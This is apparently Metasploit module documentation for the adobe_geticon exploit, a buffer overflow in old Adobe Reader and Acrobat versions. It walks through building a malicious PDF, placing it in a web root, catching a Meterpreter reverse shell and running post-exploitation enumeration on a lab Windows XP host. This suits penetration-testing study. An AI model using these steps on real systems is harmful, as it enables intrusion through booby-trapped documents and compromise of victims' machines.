documentation/modules/exploit/windows/fileformat/adobe_geticon.md
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1.
By creating a specially crafted pdf that a contains malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.
Link to vulnerable software OldVersion
The file name
use exploit/windows/fileformat/adobe_geticonset payload [windows/meterpreter/reverse_tcp]set LHOST [IP]exploituse exploit/multi/handlerset LHOST [IP]exploitmsf > use exploit/windows/fileformat/adobe_geticon
msf exploit(windows/fileformat/adobe_geticon) > set FILENAME icon.pdf
FILENAME => icon.pdf
msf exploit(windows/fileformat/adobe_geticon) > exploit
[*] Creating 'icon.pdf' file...
[+] icon.pdf stored at /root/.msf4/local/icon.pdf
msf exploit(windows/fileformat/adobe_geticon) > cp /root/.msf4/local/icon.pdf /var/www/html/icon.pdf
[*] exec: cp /root/.msf4/local/icon.pdf /var/www/html/icon.pdf
msf payload(windows/meterpreter/reverse_tcp) > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Sending stage (180291 bytes) to 192.168.1.5
[*] Meterpreter session 3 opened (192.168.1.3:4444 -> 192.168.1.5:1160) at 2019-12-06 14:40:10 -0700
meterpreter > sysinfo
Computer : COMPUTER_1
OS : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: COMPUTER_1\USER
meterpreter > run post/windows/gather/enum_applications
[*] Enumerating applications installed on COMPUTER_1
Installed Applications
======================
Name Version
---- -------
Adobe Reader 8 8.0.0
[+] Results stored in: /root/.msf4/loot/20191206144654_default_192.168.1.5_host.application_162364.txt